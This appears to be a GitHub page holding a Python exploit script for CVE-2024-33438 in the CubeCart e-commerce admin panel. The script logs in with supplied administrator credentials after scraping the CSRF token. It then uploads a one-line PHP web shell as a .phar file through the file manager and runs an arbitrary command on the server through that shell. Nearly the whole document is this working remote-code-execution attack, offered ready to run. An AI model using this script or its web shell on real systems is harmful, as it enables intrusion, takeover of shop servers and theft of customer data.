-
Notifications
You must be signed in to change notification settings - Fork 0
/
CubeCart-CVE-2024-33438.py
74 lines (60 loc) · 2.78 KB
/
CubeCart-CVE-2024-33438.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#!/usr/bin/python3
import requests
import random
import re
import sys
banner = """\n [] ,----.___
__||_/___ '.
/ O|| /|
/ "" / /
/________/ / launching exploit
|________|/ please wait...
"""
print(banner)
# General help
if len(sys.argv) == 1:
print("No arguments. Try '-h' or '--help' to understand how this exploit works.")
sys.exit()
if len(sys.argv) > 5:
print("Too many arguments. Try '-h' or '--help' to understand how this exploit works.")
sys.exit()
if len(sys.argv) < 5:
print("Not enough arguments. Try '-h' or '--help' to understand how this exploit works.")
sys.exit()
if sys.argv[1].lower() == "-h" or sys.argv[1].lower() == "--help":
print("Usage: python3 CubeCart-CVE-2024-33438.py <URL> <username> <password> <command>\nExample: python3 CubeCart-CVE-2024-33438.py http://127.0.0.1/admin_0Kqnr9.php admin admin whoami\n")
sys.exit()
# Variables
URL, username, password, cmd = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]
filename = str(random.getrandbits(32)) + ".phar"
files = {'file': (filename, '<?php system($_GET[\'cmd\']) ?>')}
# First request, grabbing the CSRF token
print("[+] Trying to log into the application...")
req1 = requests.get(URL)
token_match = re.search(r'<input type="hidden" name="token" class="cc_session_token" value="([^"]+)', req1.text)
mytoken = token_match.group(1)
# Second request, logging into the application
payload = {"username": username, "password": password, "redir": f"{URL}+p?_g=login", "login": "Log In", "token": mytoken}
req2 = requests.post(URL, data=payload, allow_redirects=False)
all_cookies = req2.headers.get("Set-Cookie")
session_cookie = re.search(r'CC'+'_([^=]+)', all_cookies)
session_cookie_name = 'CC_'+session_cookie.group(1)
session_cookie_value = re.search(r''+session_cookie_name+'=([^;]+)', all_cookies)
session_cookie_value = session_cookie_value.group(1)
# Third request, validating that the user is authenticated
req3 = requests.get(URL, cookies={session_cookie_name: session_cookie_value})
if int(req3.headers.get("Content-Length")) < 3000:
print("[!] Login failed. Exiting the exploit...")
sys.exit()
# Forth request, uploading a simple web shell
print("[+] Successful login. Uploading a simple web shell to the server...")
req4 = requests.post(URL+"?_g=filemanager", files=files, cookies={session_cookie_name: session_cookie_value})
# Fifth request, validating that the web shell was uploaded
req5 = requests.get(URL.split("/admin")[0]+"/images/source/")
if filename not in req5.text:
print("[!] It wasn't possible to upload the web shell. Exiting the exploit...")
sys.exit()
# Sixth request, executing the command
print("[+] Executing command...\n")
req6 = requests.get(URL.split("/admin")[0]+"/images/source/"+filename+"?cmd="+cmd)
print("Output: " + req6.text)